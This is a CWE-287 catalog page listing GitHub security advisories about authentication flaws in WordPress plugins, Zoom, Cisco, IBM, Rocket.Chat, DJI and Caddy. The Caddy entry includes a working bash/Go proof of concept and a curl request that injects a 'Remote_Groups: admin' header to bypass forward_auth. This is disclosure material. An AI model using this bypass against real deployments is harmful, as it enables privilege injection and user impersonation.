Common Weakness Enumeration

CWE-287

Discouraged

Improper Authentication

Abstraction: Class · Status: Draft

When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

5968 vulnerabilities reference this CWE, most recent first.

GHSA-F4HX-5JG8-HG94

Vulnerability from github – Published: 2022-05-17 19:57 – Updated: 2024-04-03 23:58
VLAI
Details

The wp-support-plus-responsive-ticket-system plugin before 4.2 for WordPress has incorrect authentication.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-10389"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-08-22T19:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The wp-support-plus-responsive-ticket-system plugin before 4.2 for WordPress has incorrect authentication.",
  "id": "GHSA-f4hx-5jg8-hg94",
  "modified": "2024-04-03T23:58:49Z",
  "published": "2022-05-17T19:57:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-10389"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/#developers"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F4M8-C8F7-HW6Q

Vulnerability from github – Published: 2023-07-13 18:30 – Updated: 2024-02-09 00:31
VLAI
Details

The firmware update package for the wireless card is not properly signed and can be modified.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-30559"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-13T18:15:09Z",
    "severity": "MODERATE"
  },
  "details": "The firmware update package for the wireless card is not properly signed and can be modified.",
  "id": "GHSA-f4m8-c8f7-hw6q",
  "modified": "2024-02-09T00:31:33Z",
  "published": "2023-07-13T18:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30559"
    },
    {
      "type": "WEB",
      "url": "https://www.bd.com/en-us/about-bd/cybersecurity/bulletin/bd-alaris-system-with-guardrails-suite-mx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F4MF-54PP-JFRW

Vulnerability from github – Published: 2022-11-21 12:30 – Updated: 2022-11-23 18:30
VLAI
Details

The WP User Frontend WordPress plugin before 3.5.29 uses a user supplied argument called urhidden in its registration form, which contains the role for the account to be created with, encrypted via wpuf_encryption(). This could allow an attacker having access to the AUTH_KEY and AUTH_SALT constant (via an arbitrary file access issue for example, or if the blog is using the default keys) to create an account with any role they want, such as admin

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-24649"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-11-21T11:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The WP User Frontend WordPress plugin before 3.5.29 uses a user supplied argument called urhidden in its registration form, which contains the role for the account to be created with, encrypted via wpuf_encryption(). This could allow an attacker having access to the AUTH_KEY and AUTH_SALT constant (via an arbitrary file access issue for example, or if the blog is using the default keys) to create an account with any role they want, such as admin",
  "id": "GHSA-f4mf-54pp-jfrw",
  "modified": "2022-11-23T18:30:29Z",
  "published": "2022-11-21T12:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-24649"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/9486744e-ab24-44e4-b06e-9e0b4be132e2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F4WC-3QJ8-GQ9P

Vulnerability from github – Published: 2023-09-12 21:30 – Updated: 2024-04-04 07:38
VLAI
Details

Improper authentication in Zoom clients may allow an authenticated user to conduct a denial of service via network access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-39215"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-449"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-12T20:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Improper authentication in Zoom clients may allow an authenticated user to conduct a denial of service via network access.",
  "id": "GHSA-f4wc-3qj8-gq9p",
  "modified": "2024-04-04T07:38:32Z",
  "published": "2023-09-12T21:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39215"
    },
    {
      "type": "WEB",
      "url": "https://explore.zoom.us/en/trust/security/security-bulletin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F4X4-Q95W-JP8R

Vulnerability from github – Published: 2022-05-17 01:35 – Updated: 2022-05-17 01:35
VLAI
Details

Cisco Video Surveillance Manager (VSM) before 7.0.0 does not require authentication for access to VSMC monitoring pages, which allows remote attackers to obtain sensitive configuration, archive, and log information via unspecified vectors, related to the Cisco_VSBWT (aka Broadware sample code) package, aka Bug ID CSCsv40169.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2013-3431"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2013-07-25T15:53:00Z",
    "severity": "HIGH"
  },
  "details": "Cisco Video Surveillance Manager (VSM) before 7.0.0 does not require authentication for access to VSMC monitoring pages, which allows remote attackers to obtain sensitive configuration, archive, and log information via unspecified vectors, related to the Cisco_VSBWT (aka Broadware sample code) package, aka Bug ID CSCsv40169.",
  "id": "GHSA-f4x4-q95w-jp8r",
  "modified": "2022-05-17T01:35:06Z",
  "published": "2022-05-17T01:35:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-3431"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85945"
    },
    {
      "type": "WEB",
      "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/61431"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1028827"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-F52W-9GXQ-49MC

Vulnerability from github – Published: 2026-04-01 21:30 – Updated: 2026-04-01 21:30
VLAI
Details

IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 under certain load conditions could allow an attacker to bypass authentication mechanisms and gain unauthorized access to the application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-4101"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-01T21:17:02Z",
    "severity": "HIGH"
  },
  "details": "IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 under certain load conditions could allow an attacker to bypass authentication mechanisms and gain unauthorized access to the application.",
  "id": "GHSA-f52w-9gxq-49mc",
  "modified": "2026-04-01T21:30:32Z",
  "published": "2026-04-01T21:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4101"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7268253"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F553-J2GV-G5R9

Vulnerability from github – Published: 2022-05-14 01:23 – Updated: 2022-11-08 14:57
VLAI
Summary
Apache Solr Kerberos delegation token functionality flaws
Details

Apache Solr's Kerberos plugin can be configured to use delegation tokens, which allows an application to reuse the authentication of an end-user or another application. There are two issues with this functionality (when using SecurityAwareZkACLProvider type of ACL provider e.g. SaslZkACLProvider). Firstly, access to the security configuration can be leaked to users other than the solr super user. Secondly, malicious users can exploit this leaked configuration for privilege escalation to further expose/modify private data and/or disrupt operations in the Solr cluster. The vulnerability is fixed from Apache Solr 6.6.1 onwards.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.solr:solr-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.2.0"
            },
            {
              "fixed": "6.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-9803"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-11-08T14:57:58Z",
    "nvd_published_at": "2017-09-18T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "Apache Solr\u0027s Kerberos plugin can be configured to use delegation tokens, which allows an application to reuse the authentication of an end-user or another application. There are two issues with this functionality (when using SecurityAwareZkACLProvider type of ACL provider e.g. SaslZkACLProvider). Firstly, access to the security configuration can be leaked to users other than the solr super user. Secondly, malicious users can exploit this leaked configuration for privilege escalation to further expose/modify private data and/or disrupt operations in the Solr cluster. The vulnerability is fixed from Apache Solr 6.6.1 onwards.",
  "id": "GHSA-f553-j2gv-g5r9",
  "modified": "2022-11-08T14:57:58Z",
  "published": "2022-05-14T01:23:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9803"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/SOLR-11184"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/f4rbt657n9x4kb74k1txhcojof5dzol5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache Solr Kerberos delegation token functionality flaws"
}

GHSA-F55J-XV27-8CWJ

Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35
VLAI
Details

Rocket.Chat in versions <8.5.1, <8.4.4, <8.3.6, <8.2.6, <8.1.6, <8.0.7, <7.13.9, and <7.10.13 is vulnerable to unauthenticated file deletion. The deleteFileMessage Meteor method permanently deletes any uploaded file by ID without requiring authentication. When called via an unauthenticated DDP WebSocket connection, Meteor.userId() returns null, causing the authorization check to be skipped. Execution falls through to FileUpload.getStore('Uploads').deleteById(fileID), which removes the file from storage and database unconditionally. File IDs are discoverable from public channel message payloads and download URLs.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-48929"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-17T13:20:44Z",
    "severity": "HIGH"
  },
  "details": "Rocket.Chat in versions \u003c8.5.1, \u003c8.4.4, \u003c8.3.6, \u003c8.2.6, \u003c8.1.6, \u003c8.0.7, \u003c7.13.9, and \u003c7.10.13 is vulnerable to unauthenticated file deletion. The deleteFileMessage Meteor method permanently deletes any uploaded file by ID without requiring authentication. When called via an unauthenticated DDP WebSocket connection, Meteor.userId() returns null, causing the authorization check to be skipped. Execution falls through to FileUpload.getStore(\u0027Uploads\u0027).deleteById(fileID), which removes the file from storage and database unconditionally. File IDs are discoverable from public channel message payloads and download URLs.",
  "id": "GHSA-f55j-xv27-8cwj",
  "modified": "2026-06-17T18:35:51Z",
  "published": "2026-06-17T18:35:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48929"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RocketChat/Rocket.Chat/pull/40889"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3611837"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F56M-QC2W-J8V5

Vulnerability from github – Published: 2026-02-02 06:30 – Updated: 2026-02-02 06:30
VLAI
Details

A vulnerability has been found in DJI Mavic Mini, Spark and Mini SE up to 01.00.0500. Affected by this vulnerability is an unknown functionality of the component Enhanced Wi-Fi Pairing. The manipulation leads to authentication bypass by capture-replay. The attack must be carried out from within the local network. A high degree of complexity is needed for the attack. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1743"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-02T04:15:55Z",
    "severity": "LOW"
  },
  "details": "A vulnerability has been found in DJI Mavic Mini, Spark and Mini SE up to 01.00.0500. Affected by this vulnerability is an unknown functionality of the component Enhanced Wi-Fi Pairing. The manipulation leads to authentication bypass by capture-replay. The attack must be carried out from within the local network. A high degree of complexity is needed for the attack. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-f56m-qc2w-j8v5",
  "modified": "2026-02-02T06:30:52Z",
  "published": "2026-02-02T06:30:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1743"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ByteMe1001/DJI-CatNect"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ByteMe1001/DJI-CatNect/blob/main/exploit.c"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.343674"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.343674"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.741323"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-F59H-Q822-G45G

Vulnerability from github – Published: 2026-06-16 21:28 – Updated: 2026-06-16 21:28
VLAI
Summary
Caddy: FastCGI header normalization bypass in `forward_auth copy_headers`
Details

Summary

forward_auth copy_headers deletes the exact client-supplied identity header before copying the trusted value from the auth gateway. But when the request later goes through php_fastcgi, Caddy normalizes HTTP headers into CGI variables by replacing - with _.

This lets a client send an underscore alias that survives the forward_auth delete step but becomes the same PHP/FastCGI variable:

Remote-Groups  -> HTTP_REMOTE_GROUPS
Remote_Groups  -> HTTP_REMOTE_GROUPS

Remote-User    -> HTTP_REMOTE_USER
Remote_User    -> HTTP_REMOTE_USER

Result: a remote client can inject or sometimes override identity/group headers trusted by PHP/FastCGI applications behind Caddy.

Details

forward_auth copy_headers intentionally removes client-controlled headers before setting values from the auth response:

  • modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:212
  • modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:222

That delete is exact-field deletion through http.Header.Del():

  • modules/caddyhttp/headers/headers.go:255
  • modules/caddyhttp/headers/headers.go:281

So deleting Remote-Groups does not delete Remote_Groups.

Later, FastCGI exports all request headers into CGI variables:

  • modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:410
  • modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:414
  • modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:510

The normalizer replaces hyphens with underscores:

strings.NewReplacer(" ", "_", "-", "_")

So the trusted header and the attacker-controlled alias collide in the backend-visible CGI/PHP namespace.

This is distinct from GHSA-7r4p-vjf4-gxv4. That issue allowed exact copied headers to survive. This report reproduces after the exact-header fix because the bypass uses a different HTTP field name that only becomes equivalent during Caddy's FastCGI export.

PoC

Run from the Caddy repository root with bash:

set -euo pipefail

tmpdir=$(mktemp -d /tmp/caddy-fastcgi-header-collision.XXXXXX)
mkdir -p "$tmpdir/www"
printf '<?php echo "ok"; ?>\n' > "$tmpdir/www/index.php"

cat > "$tmpdir/servers.go" <<'GO'
package main

import (
    "fmt"
    "log"
    "net"
    "net/http"
    "net/http/fcgi"
)

func main() {
    go func() {
        mux := http.NewServeMux()
        mux.HandleFunc("/auth", func(w http.ResponseWriter, r *http.Request) {
            w.Header().Set("Remote-User", "alice")
            w.WriteHeader(http.StatusNoContent)
        })
        log.Fatal(http.ListenAndServe("127.0.0.1:19011", mux))
    }()

    ln, err := net.Listen("tcp", "127.0.0.1:19010")
    if err != nil {
        log.Fatal(err)
    }
    log.Fatal(fcgi.Serve(ln, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        fmt.Fprintf(w, "HTTP_REMOTE_USER=%s\nHTTP_REMOTE_GROUPS=%s\n",
            r.Header.Get("Remote-User"),
            r.Header.Get("Remote-Groups"))
    })))
}
GO

cat > "$tmpdir/Caddyfile" <<EOF
{
    admin off
    auto_https off
    debug
}

:9082 {
    log
    root * $tmpdir/www
    forward_auth 127.0.0.1:19011 {
        uri /auth
        copy_headers Remote-User Remote-Groups
    }
    php_fastcgi 127.0.0.1:19010
}
EOF

cleanup() {
    kill "${caddy_pid:-}" "${servers_pid:-}" 2>/dev/null || true
}
trap cleanup EXIT

go run "$tmpdir/servers.go" >"$tmpdir/servers.log" 2>&1 &
servers_pid=$!

for i in $(seq 1 80); do
    if (echo > /dev/tcp/127.0.0.1/19011) >/dev/null 2>&1 &&
       (echo > /dev/tcp/127.0.0.1/19010) >/dev/null 2>&1; then
        break
    fi
    sleep 0.25
done

go run ./cmd/caddy run --config "$tmpdir/Caddyfile" --adapter caddyfile >"$tmpdir/caddy.log" 2>&1 &
caddy_pid=$!

for i in $(seq 1 80); do
    if (echo > /dev/tcp/127.0.0.1/9082) >/dev/null 2>&1; then
        break
    fi
    sleep 0.25
done

curl --noproxy '*' -v http://127.0.0.1:9082/index.php
curl --noproxy '*' -v -H 'Remote_Groups: admin' http://127.0.0.1:9082/index.php
cat "$tmpdir/caddy.log"

Observed on commit 6c675e29f87cbe7326983ddb6d739175119d394c:

Baseline:

> GET /index.php HTTP/1.1
< HTTP/1.1 200 OK

HTTP_REMOTE_USER=alice
HTTP_REMOTE_GROUPS=

With attacker header:

> GET /index.php HTTP/1.1
> Remote_Groups: admin
< HTTP/1.1 200 OK

HTTP_REMOTE_USER=alice
HTTP_REMOTE_GROUPS=admin

Caddy debug log confirms the FastCGI environment contained:

"HTTP_REMOTE_USER": "alice"
"HTTP_REMOTE_GROUPS": "admin"

The auth gateway returned Remote-User: alice only. It never returned Remote-Groups.

Impact

This affects Caddy deployments that use:

  • forward_auth with copy_headers for identity or authorization headers;
  • php_fastcgi / FastCGI after the auth check;
  • a PHP/FastCGI application that trusts the resulting HTTP_* variables.

Impact examples:

  • deterministic group/role injection when the auth gateway omits an optional header, e.g. Remote_Groups: admin becomes HTTP_REMOTE_GROUPS=admin;
  • probabilistic user impersonation when both the auth gateway and client provide colliding identity headers, e.g. Remote-User and Remote_User both map to HTTP_REMOTE_USER.

Realistic examples include trusted-header SSO deployments such as Firefly III remote_user_guard using HTTP_REMOTE_USER, or MediaWiki Auth_remoteuser using HTTP_X_AUTHENTIK_USERNAME.

AI disclosure

The LLM was used to help analyze the Caddy codebase, compare relevant code paths, draft the report, and organize reproduction steps. Human security research judgment and insight were used to guide the investigation, validate the root cause, run the local reproduction, assess impact, and make the final report conclusions.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/caddyserver/caddy/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/caddyserver/caddy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52845"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-290",
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T21:28:28Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`forward_auth copy_headers` deletes the exact client-supplied identity header before copying the trusted value from the auth gateway. But when the request later goes through `php_fastcgi`, Caddy normalizes HTTP headers into CGI variables by replacing `-` with `_`.\n\nThis lets a client send an underscore alias that survives the `forward_auth` delete step but becomes the same PHP/FastCGI variable:\n\n```text\nRemote-Groups  -\u003e HTTP_REMOTE_GROUPS\nRemote_Groups  -\u003e HTTP_REMOTE_GROUPS\n\nRemote-User    -\u003e HTTP_REMOTE_USER\nRemote_User    -\u003e HTTP_REMOTE_USER\n```\n\nResult: a remote client can inject or sometimes override identity/group headers trusted by PHP/FastCGI applications behind Caddy.\n\n### Details\n\n`forward_auth copy_headers` intentionally removes client-controlled headers before setting values from the auth response:\n\n- `modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:212`\n- `modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:222`\n\nThat delete is exact-field deletion through `http.Header.Del()`:\n\n- `modules/caddyhttp/headers/headers.go:255`\n- `modules/caddyhttp/headers/headers.go:281`\n\nSo deleting `Remote-Groups` does not delete `Remote_Groups`.\n\nLater, FastCGI exports all request headers into CGI variables:\n\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:410`\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:414`\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:510`\n\nThe normalizer replaces hyphens with underscores:\n\n```go\nstrings.NewReplacer(\" \", \"_\", \"-\", \"_\")\n```\n\nSo the trusted header and the attacker-controlled alias collide in the backend-visible CGI/PHP namespace.\n\nThis is distinct from GHSA-7r4p-vjf4-gxv4. That issue allowed exact copied headers to survive. This report reproduces after the exact-header fix because the bypass uses a different HTTP field name that only becomes equivalent during Caddy\u0027s FastCGI export.\n\n### PoC\n\nRun from the Caddy repository root with `bash`:\n\n```bash\nset -euo pipefail\n\ntmpdir=$(mktemp -d /tmp/caddy-fastcgi-header-collision.XXXXXX)\nmkdir -p \"$tmpdir/www\"\nprintf \u0027\u003c?php echo \"ok\"; ?\u003e\\n\u0027 \u003e \"$tmpdir/www/index.php\"\n\ncat \u003e \"$tmpdir/servers.go\" \u003c\u003c\u0027GO\u0027\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\t\"net/http\"\n\t\"net/http/fcgi\"\n)\n\nfunc main() {\n\tgo func() {\n\t\tmux := http.NewServeMux()\n\t\tmux.HandleFunc(\"/auth\", func(w http.ResponseWriter, r *http.Request) {\n\t\t\tw.Header().Set(\"Remote-User\", \"alice\")\n\t\t\tw.WriteHeader(http.StatusNoContent)\n\t\t})\n\t\tlog.Fatal(http.ListenAndServe(\"127.0.0.1:19011\", mux))\n\t}()\n\n\tln, err := net.Listen(\"tcp\", \"127.0.0.1:19010\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tlog.Fatal(fcgi.Serve(ln, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tfmt.Fprintf(w, \"HTTP_REMOTE_USER=%s\\nHTTP_REMOTE_GROUPS=%s\\n\",\n\t\t\tr.Header.Get(\"Remote-User\"),\n\t\t\tr.Header.Get(\"Remote-Groups\"))\n\t})))\n}\nGO\n\ncat \u003e \"$tmpdir/Caddyfile\" \u003c\u003cEOF\n{\n\tadmin off\n\tauto_https off\n\tdebug\n}\n\n:9082 {\n\tlog\n\troot * $tmpdir/www\n\tforward_auth 127.0.0.1:19011 {\n\t\turi /auth\n\t\tcopy_headers Remote-User Remote-Groups\n\t}\n\tphp_fastcgi 127.0.0.1:19010\n}\nEOF\n\ncleanup() {\n\tkill \"${caddy_pid:-}\" \"${servers_pid:-}\" 2\u003e/dev/null || true\n}\ntrap cleanup EXIT\n\ngo run \"$tmpdir/servers.go\" \u003e\"$tmpdir/servers.log\" 2\u003e\u00261 \u0026\nservers_pid=$!\n\nfor i in $(seq 1 80); do\n\tif (echo \u003e /dev/tcp/127.0.0.1/19011) \u003e/dev/null 2\u003e\u00261 \u0026\u0026\n\t   (echo \u003e /dev/tcp/127.0.0.1/19010) \u003e/dev/null 2\u003e\u00261; then\n\t\tbreak\n\tfi\n\tsleep 0.25\ndone\n\ngo run ./cmd/caddy run --config \"$tmpdir/Caddyfile\" --adapter caddyfile \u003e\"$tmpdir/caddy.log\" 2\u003e\u00261 \u0026\ncaddy_pid=$!\n\nfor i in $(seq 1 80); do\n\tif (echo \u003e /dev/tcp/127.0.0.1/9082) \u003e/dev/null 2\u003e\u00261; then\n\t\tbreak\n\tfi\n\tsleep 0.25\ndone\n\ncurl --noproxy \u0027*\u0027 -v http://127.0.0.1:9082/index.php\ncurl --noproxy \u0027*\u0027 -v -H \u0027Remote_Groups: admin\u0027 http://127.0.0.1:9082/index.php\ncat \"$tmpdir/caddy.log\"\n```\n\nObserved on commit `6c675e29f87cbe7326983ddb6d739175119d394c`:\n\nBaseline:\n\n```text\n\u003e GET /index.php HTTP/1.1\n\u003c HTTP/1.1 200 OK\n\nHTTP_REMOTE_USER=alice\nHTTP_REMOTE_GROUPS=\n```\n\nWith attacker header:\n\n```text\n\u003e GET /index.php HTTP/1.1\n\u003e Remote_Groups: admin\n\u003c HTTP/1.1 200 OK\n\nHTTP_REMOTE_USER=alice\nHTTP_REMOTE_GROUPS=admin\n```\n\nCaddy debug log confirms the FastCGI environment contained:\n\n```text\n\"HTTP_REMOTE_USER\": \"alice\"\n\"HTTP_REMOTE_GROUPS\": \"admin\"\n```\n\nThe auth gateway returned `Remote-User: alice` only. It never returned `Remote-Groups`.\n\n### Impact\n\nThis affects Caddy deployments that use:\n\n- `forward_auth` with `copy_headers` for identity or authorization headers;\n- `php_fastcgi` / FastCGI after the auth check;\n- a PHP/FastCGI application that trusts the resulting `HTTP_*` variables.\n\nImpact examples:\n\n- deterministic group/role injection when the auth gateway omits an optional header, e.g. `Remote_Groups: admin` becomes `HTTP_REMOTE_GROUPS=admin`;\n- probabilistic user impersonation when both the auth gateway and client provide colliding identity headers, e.g. `Remote-User` and `Remote_User` both map to `HTTP_REMOTE_USER`.\n\nRealistic examples include trusted-header SSO deployments such as Firefly III `remote_user_guard` using `HTTP_REMOTE_USER`, or MediaWiki `Auth_remoteuser` using `HTTP_X_AUTHENTIK_USERNAME`.\n\n## AI disclosure\n\nThe LLM was used to help analyze the Caddy codebase, compare relevant code paths, draft the report, and organize reproduction steps. Human security research judgment and insight were used to guide the investigation, validate the root cause, run the local reproduction, assess impact, and make the final report conclusions.",
  "id": "GHSA-f59h-q822-g45g",
  "modified": "2026-06-16T21:28:28Z",
  "published": "2026-06-16T21:28:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-f59h-q822-g45g"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/caddyserver/caddy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Caddy: FastCGI header normalization bypass in `forward_auth copy_headers`"
}

Mitigation
Architecture and Design

Strategy: Libraries or Frameworks

Use an authentication framework or library such as the OWASP ESAPI Authentication feature.

CAPEC-114: Authentication Abuse

An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.

CAPEC-115: Authentication Bypass

An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.

CAPEC-151: Identity Spoofing

Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.

CAPEC-194: Fake the Source of Data

